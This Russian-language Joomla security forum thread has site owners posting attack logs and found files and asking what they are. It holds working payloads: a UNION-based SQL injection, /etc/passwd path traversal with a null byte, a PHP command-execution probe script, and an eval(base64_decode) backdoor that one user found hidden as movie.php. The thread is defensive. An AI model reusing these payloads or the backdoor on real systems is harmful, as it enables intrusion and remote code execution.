Компоненты и скрипты для защиты сайта. Логи атак на сайты - страница 8 - Безопасность сайтов на Joomla

Пытаюстся ломануть (наверное боты) но пока безуспешно.
что пытаются сделать?!

* Union Select [GET:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
** Union Select [REQUEST:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
118.173.73.148

*HTTP_USER_AGENT :
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;

*REQUEST_METHOD :
GET

*QUERY_STRING :
view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name='CHARACTER_SETS'%20--%20;&option=com_mytube



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube

* Local File Inclusion [GET:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocaslideshow=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

* Local File Inclusion [GET:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocadownload=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg

Что хотели этим сказать?
Толи загрузить шел толи запустить, вообщем не понятно куда или откуда

Код

echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

Установи для твоей версии плагин oseSecure. И настрой вход в админку по секретному слову.

Данного файла на сервере не нашел...

46.61.6.174 | 14:54:19 10.06.2013 | /adguard-ajax-crossdomain-hack/images/helper_top_background

<?php
if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
eval (base64_decode($_POST["php"]));
exit;
}
?>

кто подскажет что за дрянь нашел у заказчика под видом  movie.php

https://code.google.com/p/nyromodal/issues/attachmentText?id=94&aid=-5299609800359686243&name=jquery-1.2.6.pack.js&token=7d6fd5ad9497b5b0aaf83a46a84ce769 -  это что ли?
Да вроде он =)
Значит зря я на него осерчал?

Файл jquery-1.2.6.pack.js?

Мне стоит ее прихлопнуть?

Конечно стоит - нафига он такой древний, да ещё и в пакере?